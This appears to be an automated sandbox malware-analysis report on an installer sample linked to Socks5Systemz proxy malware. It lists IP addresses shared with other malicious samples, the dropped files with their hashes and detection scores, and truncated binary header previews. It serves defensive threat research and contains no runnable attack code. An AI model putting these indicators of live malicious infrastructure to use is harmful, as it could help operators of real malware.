                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: AbC0LBkVhr.exe
                            TimeTypeDescription
                            08:52:40API Interceptor477574x Sleep call for process: videocapturesolution32.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            46.8.225.74KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                              AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                  j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsKRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                    • 46.8.225.74
                                    AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                    • 46.8.225.74
                                    6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                    • 46.8.225.74
                                    j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                    • 46.8.225.74
                                    b3astmode.arm5.elfGet hashmaliciousMiraiBrowse
                                    • 109.248.108.147
                                    reduce.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    ppc.elfGet hashmaliciousMiraiBrowse
                                    • 46.8.228.104
                                    file.exeGet hashmaliciousCryptbotBrowse
                                    • 46.8.237.112
                                    FREE-NET-ASFREEnetEUamd64.elfGet hashmaliciousUnknownBrowse
                                    • 193.233.202.23
                                    TRC.arm.elfGet hashmaliciousMiraiBrowse
                                    • 147.45.45.242
                                    htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                    • 147.45.44.131
                                    Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                    • 147.45.44.131
                                    Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                                    • 147.45.44.131
                                    Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                    • 147.45.44.131
                                    EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                    • 147.45.44.131
                                    arm5.elfGet hashmaliciousUnknownBrowse
                                    • 193.233.202.23
                                    Wh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 147.45.47.151
                                    installer.exeGet hashmaliciousUnknownBrowse
                                    • 193.233.254.0
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\ProgramData\EShineEncoder\sqlite3.dllOz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                      GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                        GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                          bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                            bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                              Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                  2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                    2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                      7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3281038
                                                        Entropy (8bit):6.6109330082563496
                                                        Encrypted:false
                                                        SSDEEP:98304:hHY4bl5znLaEGzUjIX24RJ4IB//bR6SodyUfalD:hH9l5znLaEGK/Sody9lD
                                                        MD5:F980DB1C4941DE93EA4A88045D20F6D5
                                                        SHA1:990341E89AE748B370CCF38CA167FF9A8D548256
                                                        SHA-256:0325826FD16CEC2AB3F6C56C29B800EBC9E4C33C686BA1D17871B7E3C3091479
                                                        SHA-512:50B31F989AF64CA6EEF354CDAB52041FE0EB5EF3D3BB57295AE9130EE7D50C1172DE921381523E9388524050E1DBB1B1BE3F0D81A7321E9E43CA68C124B67C9C
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\EShineEncoder\EShineEncoder.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L..._..L.....................T...................@..........................p2......z2.....................................T...........`...............................................................................|..........................._rste_2............................. ..`_rstf_2.............................@..@_rstg_2..d... ...0..................@....rsrc................6..............@..@_rsth_2...!..p.... .................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):645592
                                                        Entropy (8bit):6.50414583238337
                                                        Encrypted:false
                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: Oz2UhFBTHy.exe, Detection: malicious, Browse
                                                        • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                        • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                        • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                        • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                        • Filename: Ni2ghr9eUJ.exe, Detection: malicious, Browse
                                                        • Filename: Ni2ghr9eUJ.exe, Detection: malicious, Browse
                                                        • Filename: 2mtt3zE6Vh.exe, Detection: malicious, Browse
                                                        • Filename: 2mtt3zE6Vh.exe, Detection: malicious, Browse
                                                        • Filename: 7i6bUvYZ4L.exe, Detection: malicious, Browse
                                                        Reputation:high, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:ISO-8859 text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):8
                                                        Entropy (8bit):2.0
                                                        Encrypted:false
                                                        SSDEEP:3:vCXn:aX
                                                        MD5:D783207CFC6F852A3070147771E71B57
                                                        SHA1:2374111D557D0CE2DF48E0F413B03FE93212F1C2
                                                        SHA-256:D596D77F2F9E4A593ECCD664352C81A2B54974E501F136C292317FE03CEC8273
                                                        SHA-512:083985DBED8900DB449819CC105CF23717C5DF468BD4650CCBF1D24FBD4C986D2FB829124DDBDA1CD83893EBA1ADC051663A1202EDF1389425CDE8F9AA77D3D1
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.0`g....
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4
                                                        Entropy (8bit):0.8112781244591328
                                                        Encrypted:false
                                                        SSDEEP:3:Y:Y
                                                        MD5:1EBC4541E985D612A5FF7ED2EE92BF3D
                                                        SHA1:BBF9EC5CD7F3ABEB6119901F8E7AB2DCDDDAF1EB
                                                        SHA-256:28276425D45829D4E6F5E18AEFBF1F62862F07260A904532FB6E2106DEC973E6
                                                        SHA-512:658B7C94407138B7113DC15D2E432936409FE1D06961A3DE4DD72D92A47E7F7C93582F9DE57D7F564EB7D905D21D8035A1ACA22873D25A6FCAB88CC42618E876
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:-...
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):128
                                                        Entropy (8bit):2.9545817380615236
                                                        Encrypted:false
                                                        SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                        MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                        SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                        SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                        SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                        Malicious:false
                                                        Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                        Process:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):128
                                                        Entropy (8bit):1.7095628900165245
                                                        Encrypted:false
                                                        SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                        MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                        SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                        SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                        SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                        Malicious:false
                                                        Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2560
                                                        Entropy (8bit):2.8818118453929262
                                                        Encrypted:false
                                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6144
                                                        Entropy (8bit):4.215994423157539
                                                        Encrypted:false
                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                        MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                        SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                        SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                        SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23312
                                                        Entropy (8bit):4.596242908851566
                                                        Encrypted:false
                                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\AbC0LBkVhr.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):704000
                                                        Entropy (8bit):6.506187629302128
                                                        Encrypted:false
                                                        SSDEEP:12288:2/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRvh1K8xyF:GkqZ1G7DMvrP537dzHsA6hcHGbH3Ephs
                                                        MD5:2A520A4553D90F23218A97B9476D232A
                                                        SHA1:1C279178A6B5FFB3FCF6B946C63ABCBC81D6505E
                                                        SHA-256:65BDC20123135632BBE83EBB1EC3E4DC2F29D0446CAA7CE7D02E15954666FA27
                                                        SHA-512:DFDFE497851745CCB3698C574ACACDEDDAD2B830B63C98C52A2B382E4A6EF70FC65F9B98D12B257AE8AC2CD381AD80D9AF912AFA16E14FEAC3E1AEAEC30E5E04
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:MS Windows HtmlHelp Data
                                                        Category:dropped
                                                        Size (bytes):78183
                                                        Entropy (8bit):7.692742945771669
                                                        Encrypted:false
                                                        SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                        MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                        SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                        SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                        SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                        Malicious:false
                                                        Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):265728
                                                        Entropy (8bit):6.4472652154517345
                                                        Encrypted:false
                                                        SSDEEP:6144:Fs7u3JL96d15Y2BmKh678IuYAhN3YCjlgiZioXyLWvCe93rZ5WZOlUmpNJ5mlbb/:e7WJL96d15Y2BmKh678IuYAhN3YCjlgw
                                                        MD5:752CA72DE243F44AF2ED3FF023EF826E
                                                        SHA1:7B508F6B72BD270A861B368EC9FE4BF55D8D472F
                                                        SHA-256:F8196F03F8CBED87A92BA5C1207A9063D4EEBB0C22CA88A279F1AE1B1F1B8196
                                                        SHA-512:4E5A7242C25D4BBF9087F813D4BF057432271A0F08580DA8C894B7C290DE9E0CF640F6F616B0B6C6CAD14DC0AFDD2697D2855BA4070270824540BAE835FE8C4A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..=...........!................`;.......................................P.......................'..............p...o.......d.... .......................0..\.......................................................4............................text...k........................... ..`.rdata..............................@..@.data....9.......0..................@....idata..............................@....rsrc........ ......................@..@.reloc..T....0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):176128
                                                        Entropy (8bit):6.204917493416147
                                                        Encrypted:false
                                                        SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                        MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                        SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                        SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                        SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1645320
                                                        Entropy (8bit):6.787752063353702
                                                        Encrypted:false
                                                        SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                        MD5:871C903A90C45CA08A9D42803916C3F7
                                                        SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                        SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                        SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):499712
                                                        Entropy (8bit):6.414789978441117
                                                        Encrypted:false
                                                        SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                        MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                        SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                        SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                        SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):3281038
                                                        Entropy (8bit):6.610932603337768
                                                        Encrypted:false
                                                        SSDEEP:98304:aHY4bl5znLaEGzUjIX24RJ4IB//bR6SodyUfalD:aH9l5znLaEGK/Sody9lD
                                                        MD5:AD793723C7B5C71BD389D31B46EFEA2F
                                                        SHA1:D10ECA47CE9632C0B48ED700BC3EE230332214CE
                                                        SHA-256:1420199F25C2C6C8121108CBDF691F12A1570A72B311B7F6C10F5B0061ED6FA8
                                                        SHA-512:DCF2D0547AFAF28D140F54FA4299574AC81CC448487BBF640182CA40B8D402DF4C4508F92EEB394E33B31DE740214B95F9226EE10A78E45E2D08BCCB01CCB99F
                                                        Malicious:false
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\is-3B09G.tmp, Author: Joe Security
                                                        Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L..._..L.....................T...................@..........................p2......z2.....................................T...........`...............................................................................|..........................._rste_2............................. ..`_rstf_2.............................@..@_rstg_2..d... ...0..................@....rsrc................6..............@..@_rsth_2...!..p.... .................`...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):445440
                                                        Entropy (8bit):6.439135831549689
                                                        Encrypted:false
                                                        SSDEEP:12288:sosmML3+OytpWFkCU1wayvT33iiDNmAE27R9sY9kP0O+:soslvJ3RaY9wU
                                                        MD5:CAC7E17311797C5471733638C0DC1F01
                                                        SHA1:58E0BD1B63525A2955439CB9BE3431CEA7FF1121
                                                        SHA-256:19248357ED7CFF72DEAD18B5743BF66C61438D68374BDA59E3B9D444C6F8F505
                                                        SHA-512:A677319AC8A2096D95FFC69F22810BD4F083F6BF55B8A77F20D8FB8EE01F2FEE619CE318D1F55C392A8F3A4D635D9285712E2C572E62997014641C36EDC060A2
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..=...........!.........\......@!....................................... .......................'..........................P.......H.......................l....................................................................................text............................... ..`.rdata..2$.......&..................@..@.data...............................@....idata..............................@....rsrc...H...........................@..@.reloc...&.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1645320
                                                        Entropy (8bit):6.787752063353702
                                                        Encrypted:false
                                                        SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                        MD5:871C903A90C45CA08A9D42803916C3F7
                                                        SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                        SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                        SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):348160
                                                        Entropy (8bit):6.542655141037356
                                                        Encrypted:false
                                                        SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                        MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                        SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                        SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                        SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
